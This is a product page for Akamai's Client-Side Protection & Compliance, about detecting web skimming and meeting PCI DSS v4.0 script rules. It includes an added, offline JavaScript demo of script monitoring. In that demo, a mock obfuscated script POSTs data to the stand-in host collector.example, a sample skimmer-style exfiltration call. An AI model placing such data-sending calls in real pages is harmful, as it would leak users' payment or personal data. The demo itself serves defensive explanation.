Client-Side Protection & Compliance

Defend your site from client-side threats. Ease compliance with PCI DSS v4.0.

Strengthen your web page integrity

Client-Side Protection & Compliance helps protect against end-user data exfiltration and shield websites from JavaScript threats. It analyzes script behavior in real time, provides actionable insights in a single dashboard view, and delivers alerts to mitigate harmful script activity. Designed for PCI DSS v4.0, the solution helps businesses meet new script security requirements and safeguards against client-side attacks.

How it works

Setup

Inject simple scripts into each monitored page without meaningfully impacting performance.

Assess

Monitor and assess script activity from the browser while machine learning techniques analyze the risk of unauthorized action.

Alert

Get real-time alerts, with detailed information about mitigation, if an active threat or attack is found.

Mitigate

Immediately restrict malicious scripts from accessing and exfiltrating sensitive data on protected pages with one click.

Root out the insidious client-side threats you can’t see

Accelerate PCI DSS v4.0 compliance

Streamline workflows for PCI DSS v4.0 script security requirements 6.4.3 and 11.6.1.

Discover attacks in real time with a proven solution

Achieve comprehensive detection and defense against client-side attacks. Mitigate attacks with one click.

Reveal malicious code and vulnerabilities

Get real-time visibility into the cyberthreats and vulnerabilities within all your scripts.

Features

  • Behavior detection and protection allows monitoring of scripts in real time and protects against client-side attacks
  • Streamlined PCI DSS v4.0 workflows
  • Create and manage policies for zero-day vulnerabilities and recurring threats without exposing sensitive data
  • Flexible deployment at the edge or from origin
  • Vulnerability-focused policy continuously analyzes URLs for Common Vulnerabilities and Exposures (CVE)
  • Prioritized real-time security alerts with risk scores and insights on how to mitigate attacks
  • Intuitive, user-friendly reporting capabilities including dashboards to see script data at a glance and detailed incident reports

Frequently Asked Questions (FAQ)

Client-Side Protection & Compliance does not collect PII data, input/form data, innerHTML (strings/texts), European Union General Data Protection Regulation–related data, or payment data (PCI DSS).

Client-Side Protection & Compliance as a solution is PCI compliant. It also helps businesses directly address requirements 6.4.3 and 11.6.1 in the latest PCI DSS v4.0, released in March 2022. Compliance with these requirements will be mandatory as of March 2025.

Client-Side Protection & Compliance injects JavaScript in the beginning of your page code and then monitors what happens — what the callouts are doing and what is risky between the web server and the client.

Client-Side Protection & Compliance works for sites ranging from the simplest to the most complex.

Akamai architects its products with the understanding that our customers cannot have any latency — their business depends on it. Client-Side Protection & Compliance, like all of Akamai’s products, is highly efficient, and any impact to your app/site performance should not impact the user experience.

Client-Side Protection & Compliance does not require change notifications or manual updates.

The edge is responsible for injecting the Client-Side Protection & Compliance code as the first resource. This is done synchronously so the Client-Side Protection & Compliance code is always the first to run; there is nothing the web page can do to avoid it. This includes third-party JavaScript that might have been corrupted. However, if the end user’s browser has malware on it (e.g., a corrupted extension), the browser can do things to the page before it even loads, including killing all scripts on the page. In this case, Client-Side Protection & Compliance cannot protect that user from an attack, as it will not be the first script that runs. This is always true with malware and client-side browsers.

JavaScript obfuscation is a series of code transformations that turn plain, easy-to-read JavaScript code into a modified version that is extremely hard to understand and reverse engineer. This means that all function and variable names are converted to meaningless names. A limited number of objects are not obfuscated, such as strings and calls to native browser functions. JavaScript as a language doesn’t have built-in access to things like making network requests or interacting with the page; those are provided as native functions the browser makes available in the global context. Since the native function names are part of the browser, they cannot be obfuscated.
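The two answers above (first-to-run injection, and native function names surviving obfuscation) can be seen together in a small offline simulation. This is an added illustration, not Akamai's code: the fake window object, the function names, the allowlist and the sample script are all constructed for the example.

```javascript
// Added illustration, not Akamai's code. All names are hypothetical.
// Stand-in for the browser global object so the example runs offline in Node.
function makeFakeWindow() {
  return { fetch: (url) => ({ ok: true, url }) }; // constructed stub, no network
}

// Wraps a native entry point and records every call made through it.
function installMonitor(win, allowedHosts) {
  const events = [];
  const nativeFetch = win.fetch;
  win.fetch = function (url, opts) {
    const host = new URL(url).host;
    events.push({ api: 'fetch', host, allowed: allowedHosts.includes(host) });
    return nativeFetch(url, opts);
  };
  return events;
}

// Constructed sample of obfuscated third-party code: identifiers are
// meaningless, but the string and the native name `fetch` survive.
const OBFUSCATED_SAMPLE = `
  var _0x1a = 'https://collector.example/c';
  function _0x2b(_0x3c) { return fetch(_0x1a, { method: 'POST', body: _0x3c }); }
  _0x2b('placeholder');
`;

// Executes page script with the window's current properties as its globals.
function runScript(win, source) {
  new Function(...Object.keys(win), source)(...Object.values(win));
}

// Returns the monitor's recorded events for either load order.
function simulate(monitorFirst) {
  const win = makeFakeWindow();
  let events = [];
  if (monitorFirst) events = installMonitor(win, ['shop.example']);
  runScript(win, OBFUSCATED_SAMPLE);
  if (!monitorFirst) events = installMonitor(win, ['shop.example']);
  return events;
}

console.log(simulate(true));  // monitor loaded first: one flagged call
console.log(simulate(false)); // monitor loaded after the script: nothing seen
```

With the monitor installed first, the call is recorded with its destination host even though every identifier in the script is meaningless; installed afterwards, the same call goes unobserved, which is why the injection has to be synchronous and first.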

Products that work well with Client-Side Protection & Compliance

App & API Protector

One-stop, zero-compromise security for websites, applications, and APIs.

API Security

Gain full visibility into your entire API estate with continuous detection and monitoring.

Bot Manager

Stop the most dangerous, evasive bots before they erode customer trust.

Client-Side Protection & Compliance use cases

PCI DSS v4.0 Compliance

Comply with PCI DSS v4.0

Compliance and auditing tasks can be a massive burden for security teams. Client-Side Protection & Compliance addresses the new client-side security requirements outlined in PCI DSS v4.0, which is scheduled to take effect in March 2025. With one simple tool, you can inventory, justify, and monitor all scripts observed on protected payment pages — with actionable alerts that notify security teams on unauthorized solution tampering and suspicious script behavior in real time.

Web Skimming and Magecart Attacks

Rapid defense against client-side attacks

Malicious or compromised JavaScript resources within the browser allow web skimming, formjacking, and Magecart attacks to steal payment card data, user credential details, or personally identifiable information. The attacker injects malicious code or malware into a website’s sensitive payment pages to extract and harvest personal information. The data exfiltration that results from these types of attacks not only damages customer trust and brand loyalty, but also subjects organizations to substantial fines. Client-Side Protection & Compliance’s behavioral detection technology constantly analyzes the behavior of script execution, in real-user sessions, to identify suspicious or outright malicious behavior, and notifies security teams with actionable insights for immediate mitigation.

Client-Side Visibility

Reveal JavaScript vulnerabilities

Keeping web applications secure against data breaches requires comprehensive defense — and visibility. While many organizations defend against data exfiltration by focusing on protecting connections among their servers and end users through a web application firewall (WAF), there’s a blind spot when it comes to client-side activities. Client-Side Protection & Compliance goes beyond what WAFs can see or defend against on the client side. It helps organizations secure sensitive information by providing extensive visibility into script vulnerabilities and behaviors. Client-Side Protection & Compliance’s advanced dashboard allows security teams to analyze suspicious activity at a granular level, and rapidly take action on threats to the security of payment card data and personally identifiable information.  

Infographic

A Walk on the Client Side

Get a visual breakdown of the dangers of web skimming and third-party JavaScript — and how PCI DSS v4.0 is addressing it.

Checklist

PCI DSS v4.0 JavaScript Security Checklist

Read about upcoming requirements in PCI DSS v4.0 and how Client-Side Protection & Compliance can help organizations meet them.
